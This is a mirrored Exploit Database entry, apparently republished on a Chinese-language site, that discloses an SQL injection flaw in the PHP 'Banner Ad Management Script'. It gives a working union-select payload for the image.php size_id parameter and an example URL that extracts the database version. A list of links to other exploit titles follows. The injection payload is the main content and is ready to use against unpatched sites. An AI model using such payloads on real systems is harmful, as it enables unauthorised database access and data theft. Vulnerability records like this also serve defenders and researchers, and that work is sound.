Banner Ad Management Script – SQL Injection

Exploit Database
10 阅读

作者： Egyptian.H4x0rz

日期： 2011-04-03
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/17107/

####################################################################
[+] Exploit Title : Banner Ad Management Script [ Sql Injection Vulnerability]
[+] Author : Egyptian.H4x0rz
[+] Contact : SpY(at)Hotmail.Com
[+] Date : 02-04-2011
[+] Software Link: http://www.softbizscripts.com/banner-ads-management-script-features.php
[+] category: Web Apps [SQli]
[+] HomePage : Black-hat.cc
####################################################################
Vulnerability:

*SQL injection Vulnerability*
 
[#] http://patch/image.php?size_id=-1+union+select+1,[sqli],3,4,5,6,7,8,9,10,11
~
[#] eXample
http://www.site.com/ad-manager/image.php?size_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11


####################################################################

last Exploits
Banner Ad Management Script – SQL Injection的更多信息

Hasura GraphQL 1.3.3 – Service Side Request Forgery (SSRF)：
Joomla! Component redSHOP 1.0 – Local File Inclusion：
RaakCMS – Multiple Vulnerabilities：
IBSng B1.34(T96) – ‘str’ Cross-Site Scripting：
Joomla! 1.5 – URL Redirecting：
Lead Capture – ‘login.php’ Script Cross-Site Scripting：
Plogger 1.0-RC1 – (Authenticated) Arbitrary File Upload：
Victor CMS 1.0 – ‘cat_id’ SQL Injection：